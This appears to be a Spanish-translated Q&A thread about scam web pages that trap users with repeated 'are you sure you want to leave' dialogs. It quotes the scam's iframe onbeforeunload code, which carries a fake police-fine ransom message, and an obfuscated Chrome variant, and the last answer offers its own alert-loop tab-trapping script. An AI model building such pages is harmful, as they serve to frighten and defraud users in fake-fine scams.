El sitio impide que el usuario cierre la pestaña / cierre el navegador

Actualización: esto ya no es una preocupación para Firefox (29+) y Chrome (versión? no estoy seguro si alguna vez hubo un problema allí). Firefox solo mostrará un solo diálogo ahora.

Firefox 31 además hace que el diálogo no sea modal, y también cerrará la ventana si presiona el botón de cerrar por segunda vez.

Desafortunadamente, IE11 todavía muestra múltiples diálogos. No estoy seguro de si Microsoft tiene conocimiento de este problema.

El método es bastante simple, en realidad. Si inspecciona la fuente, verá mucha repetición de esta línea:

<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'YОUR BRОWSЕR HAS BЕЕN LОCKЕD. АLL PC DАTА WILL BЕ DЕTАINЕD АND CRIMINАL PRОCЕDURЕS WILL BЕ INITIАTЕD АGАINST YОU IF THЕ FINЕ WILL NОT BЕ PАID.';} </script>" src="au/close.php"></iframe>

Básicamente, tienen una gran cantidad de iframes y cada iframe puede activar el mensaje '¿estás seguro de que quieres salir' una vez? No es infinito de ninguna manera (como dijo Braiam, puedes mantener presionado ingresar en la página de licencia), pero probablemente sea suficiente para engañar a algunas personas.

Podría decirse que se está comportando de la forma prevista, aunque puede ser mejor agregar una de esas casillas de verificación "no volver a mostrar", como lo hacen para alert popups.

Otra forma de evitar este tipo de cosas es deshabilitar JavaScript en sitios en los que no confías. NoScript funciona bien. Sin embargo, esto puede ser algo molesto y / o romper sitios a veces.

Para los interesados: Chrome en realidad muestra un diálogo largo. Esto viene con sus propios problemas, y este es un error del navegador: los botones se eliminan de la parte inferior de la página (ocurre con cualquier ventana emergente de Chrome demasiado larga). Aún puedes presionar ingresar . El diálogo de Chrome parece ser iniciado por una ventana emergente alert diferente, y en realidad no parece mostrar el texto de descarga del iframe en absoluto. Es probable que hayan agregado esto específicamente para atrapar a los usuarios de Chrome:

<script type="text/javascript">window.onbeforeunload = function(env){var str = '\n\nUw br' + 'оws' + 'еr is gе' + 'blо' + 'kkе' + 'еrd.\n\nAl' + 'le P' + 'C dа' + 'tа zu' + 'lle' + 'n wо' + 'rde' + 'n vа' + 'stgе' + 'hou' + 'den e' + 'n st' + 'rаf' + 'rес' + 'htе' + 'li' + 'jk' + 'е pr' + 'ocе' + 'dur' + 'es zu' + 'lle' + 'n wо' + 'rd' + 'en ing' + 'еlе' + 'id te' + 'ge' + 'n u al' + 's d' + 'e bo' + 'еt' + 'е ni' + 'et wo' + 'rd' + 't be' + 'taa' + 'ld.\n\n';
        alert(str);
    return str;
}
</script>

Una vez más, no es más que una ventana emergente que parece imposible de eliminar. ¿Malicioso? Sí. En realidad peligroso? Realmente no. Mientras no te enamores de la estafa.

También es de interés potencial que do muestre su IP pública y su ubicación aproximada. Esta es una táctica de miedo bastante estándar en estos sitios de estafa y realmente no es nada especial: cualquier sitio al que se conecte puede obtener su IP pública, y las bases de datos públicas de GeoIP generalmente pueden proporcionar la ubicación aproximada. Si estás realmente preocupado, ve y obtén una VPN o un proxy anónimo para conectarte.

Puedes ir con bucle de alerta, así como crear una función de llamada en el cuerpo. He agregado muchos eventos en el cuerpo.

Aquí puede encontrar un ejemplo práctico de esto.

<script>
  var errormessage_text = "***System Alert***";
  var redirect_url = window.location;
</script></code>
<body onload="myFunction();" onmouseover="myFunction();" onclick="myFunction();" onkeydown="myFunction();" onunload="myFunction();">
<script>
    window.onbeforeunload=function(){
    window.location.href=redirect_url,'_blank';
    return errormessage_text;
  };
 for(i=0;i<99;i++){alert(errormessage_text);}<//script>